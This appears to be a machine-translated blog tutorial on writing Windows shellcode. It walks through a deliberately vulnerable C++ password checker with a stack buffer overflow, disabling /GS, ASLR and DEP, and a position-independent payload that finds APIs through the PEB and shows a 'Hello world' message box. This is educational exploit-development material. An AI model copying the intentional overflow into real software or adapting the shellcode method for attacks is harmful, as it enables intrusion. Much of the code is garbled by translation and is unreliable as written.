Shellcode Getting Started (win)

Important thing to say, do Windows security must use win computer physical machine. I use the Mac has a lot of bugs many function addresses are not available. So write Shellcode must pay attention to the platform
1. Write a code with buffer overflow first

ConsoleApplication1.cpp: Defines the entry point of the console application. #include "stdafx.h" #include <windows.h> #define PASSWORD "Allen" int VerifyPassword (char *pszpassword, int nSize    ) {char szbuffer[50];    memcpy (Szbuffer, Pszpassword, nSize); Return strcmp (PASSWORD, szbuffer);}    int _tmain (int argc, _tchar* argv[]) {int nflag = 0;    Char szpassword[0x200];    FILE *FP;    LoadLibraryA ("user32.dll");        if (null = = (fp = fopen ("Password.txt", "RB")) {MessageBoxA (null, "Open file Failed", "error", NULL);    Exit (0);    } fread (Szpassword, sizeof (Szpassword), 1, FP);    Nflag = VerifyPassword (szpassword, sizeof (Szpassword));    if (nflag) printf ("Password error \ n");    else printf ("Password is correct \ n");    Fclose (FP);    System ("pause"); return 0;} To turn off a few things 1. Disable security check (/gs-)! [] (http://i2.51cto.com/images/blog/201806/04/96dbe0d026ab95e35d2f6cc1df2a5959.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=) 2. Turn off random base addresses and fixed base addresses! [] (Http://i2.51cto.com/images/blog/201806/04/a121262ee1197272ab5e3d1f1cbc9da2.png?x-oss-process=image/watermark,size_16, text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=) 3. Disable the inline Function! [] (http://i2.51cto.com/images/blog/201806/04/f6bce8ddaceb83c682fcd8fe4088c87a.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=) 4 Close dep! [] (http://i2.51cto.com/images/blog/201806/04/1eaed1d3a8c3a0872f6a7e97d06f1091.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=)

There's a definite overflow here.
Write some good-to-remember numbers to differentiate between overflow addresses
Password.txt

A8A9B8B9C8C9D8D9E8E9F8F9G8G9H8H9I8I9J8J9K8K9L8L9N8N9M8M90000P8P9Q8Q9R8R9S8S9T8T9U8U9V8V9W8W9X8X9Y8Y9Z8Z9

Overflow of three running programs

But it's going to be a little win10 to look at the overflow address in the log.
1. Open Control Panel to find administrative tools

Open Event Viewer

Open win Log

Open the application to find the appropriate error program



Locate the MessageBoxA address in OD and put 20 0 (4 parameters plus a return value for 5 reasons there is a return value)


Run the program

Now start with the code to write only this local shellcode (the corresponding function address to find and write in OD)

#include <windows.h>int main () {LoadLibraryA ("user32.dll");  __asm {sub ESP, 0x60;      Raise the stack frame in jmp tag_shellcode; The preceding code avoids the subsequent data being interpreted as instruction//[tag_next-0x1a] MessageBoxA Address _asm _emit (0xb0) _asm _emit (0xf8) _asm _emit (0x56 ) _asm _emit (0x76)//[tag_next-0x16] exitprocess Address _asm _emit (0xe0) _asm _emit (0x3b) _asm _emit (0XA7) _asm _emit (0x75)//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6F) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6F) _asm _emit (0x72) _asm _emit (        0X6C) _asm _emit (0x64) _asm _emit (0x21) _asm _emit (0x00) Tag_shellcode:call tag_next;                    Tag_next:pop ESI;               Getpc xor edx, edx;      Will edx clear 0 Lea EDI, [esi-0x12];      Get the string address mov eax, [esi-0x1a];                   Get MessageBoxA address push edx; /-utype push Edi                   |-lpcaption push EDI;                   |-lptext push edx;                   |-hwnd call eax;      MessageBoxA mov eax, [esi-0x16];                   Get exitprocess address push edx;                   *-uexitcode call eax; exitprocess*/} return 0;}

Run

Now use dbg to copy the opcode.
Sub ESP, 0x60; To call eax;
corresponding address

#include <windows.h>int main(){    LoadLibraryA("user32.dll");    char bShellcode[] = { "\x83\xEC\x60\xEB\x15\xB0\xF8\x56\x76\xE0\x3B\xA7\x75\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\xE8\x00\x00\x00\x00\x5E\x33\xD2\x8D\x7E\xEE\x8B\x46\xE6\x52\x57\x57\x52\xFF\xD0\x8B\x46\xEA\x52\xFF\xD0" };    __asm {        lea eax, bShellcode;        push eax;        ret    }    return 0;}

Run

Start putting files

Find the address it wants to copy (that is, the value of EAX)


After executing the copy function, an overflow occurred and the return value was changed.


Success

And here's the real shellcode.

ConsoleApplication2.cpp: Defines the entry point of the console application.        #include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {__asm {Pushad;        Sub ESP, 0x100;        JMP Tag_shellcode; [tag_next-0x52] "GetProcAddress" _asm _emit (0x47) _asm _emit (0x65) _asm _emit (0x74) _asm _emit (0x50) _asm _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x41) _asm _emit (0x64) _asm _emit (0x64) _asm _emit (0x72) _        ASM _emit (0X65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00)//[tag_next-0x44] "Loadlibraryexa\0" _asm _emit (0x4c) _asm _emit (0x6f) _asm _emit (0x61) _asm _emit (0x64) _asm _emit (0x4c) _asm _emit (0x69) _asm _emit  (0x62) _asm _emit (0x72) _asm _emit (0x61) _asm _emit (0x72) _asm _emit (0x79) _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x35] "User32.dll\0" _asm _emit (0x55) _asm _emit (0x73) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x33) _asm _emit (0x32) _asm _emit (0x2e) _asm _emit (0x64) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x00)//[tag_next-0x2a] "Messageboxa\0" _asm _emit (0x4d) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x61) _asm _emit (0x67) _asm _em It (0x65) _asm _emit (0x42) _asm _emit (0x6f) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x 1E] "exitprocess\0" _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x69) _asm _emit (0x74) _asm _emit (0x50) _a SM _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00        )//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6f) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6f) _asm _emit (0x72) _asm _emit (0x6c) _asm _em                 It (0x64) _asm _emit (0x21) _asm _emit (0x00) Tag_shellcode:call tag_next;              Tag_next:       Pop ebx;                     Get critical module Base address mov esi, DWORD ptr fs: [0x30];                     mov esi, [esi + 0x0c];                     mov esi, [esi + 0x1c];                     mov esi, [esi];                     mov edx, [esi + 0x08];                     Gets the function address of the GetProcAddress push ebx;                     Push edx;                     Call fun_getprocaddress;                     mov esi, eax;                     Gets the function address of the loadlibraryexa push edx;                     Lea ECX, [ebx-0x44];                     push ecx;                     Push edx;                     call eax;                     Pop edx;                     Call payload partial push ebx;                     Push ESI;                     push eax;                     Push edx;                 Call Fun_payload;                     Fun_getprocaddress:push EBP;                     MOV ebp, esp; Sub ESP, 0x0c;                     Push edx;                     Get the address of eat, ENT and EOT mov edx, [ebp + 0x08];                     mov esi, [edx + 0x3c];                     Lea ESI, [edx + esi];                     mov esi, [esi + 0x78];                     Lea ESI, [edx + esi];                     mov edi, [esi + 0x1c];                     Lea EDI, [edx + edi];                     MOV[EBP-0X04], EDI;                     mov edi, [esi + 0x20];                     Lea EDI, [edx + edi];                     MOV[EBP-0X08], EDI;                     mov edi, [esi + 0x24];                     Lea EDI, [edx + edi];                     MOV[EBP-0X0C], EDI;                     The cycle compares the function name in ENT with the XOR eax, eax;                 JMP tag_firstcmp;                 Tag_cmpfunnameloop:inc eax;                     Tag_firstcmp:mov esi, [ebp-0x08];                     mov esi, [esi + 4 * EAX]; mov edx, [Ebp +0X08];                     Lea ESI, [edx + esi];                     mov ebx, [ebp + 0x0c];                     Lea EDI, [ebx-0x53];                     mov ecx, 0x0e;                     Cld                     Repe CMPSB;                     Jne Tag_cmpfunnameloop;                     Successful after finding the corresponding serial number mov esi, [ebp-0x0c];                     XOR EDI, EDI;                     mov di, [esi + eax * 2];                     Use the ordinal as the index, find the function address corresponding to the functions of the name mov edx, [ebp-0x04];                     mov esi, [edx + EDI * 4];                     mov edx, [ebp + 0x08];                     Returns the key function that gets to the address of Lea EAX, [edx + esi];                     Pop edx;                     mov esp, EBP;                     Pop ebp;                 RETN 0x08;                     Fun_payload:push EBP;                     MOV ebp, esp;                     Sub ESP, 0x08;                     mov ebx, [ebp + 0x14]; Get MeSsageboxa function Address Lea ecx, [ebx-0x35];                     Push 0;                     Push 0;                     push ecx;                     CALL[EBP + 0x0c];                     Lea ECX, [ebx-0x2a];                     push ecx;                     push eax;                     CALL[EBP + 0x10];                     MOV[EBP-0X04], eax;                     Get the function address of ExitProcess lea ECX, [ebx-0x1e];                     push ecx;                     PUSH[EBP + 0x08];                     CALL[EBP + 0x10];                     MOV[EBP-0X08], eax;                     Show Lea ECX, [ebx-0x12];                     Push 0;                     push ecx;                     push ecx;                     Push 0;                     CALL[EBP-0X04];                     Push 0;                     CALL[EBP-0X08];                     mov esp, EBP;                     Pop ebp;    RETN 0x10; } return 0;}

Shellcode Get Started (win)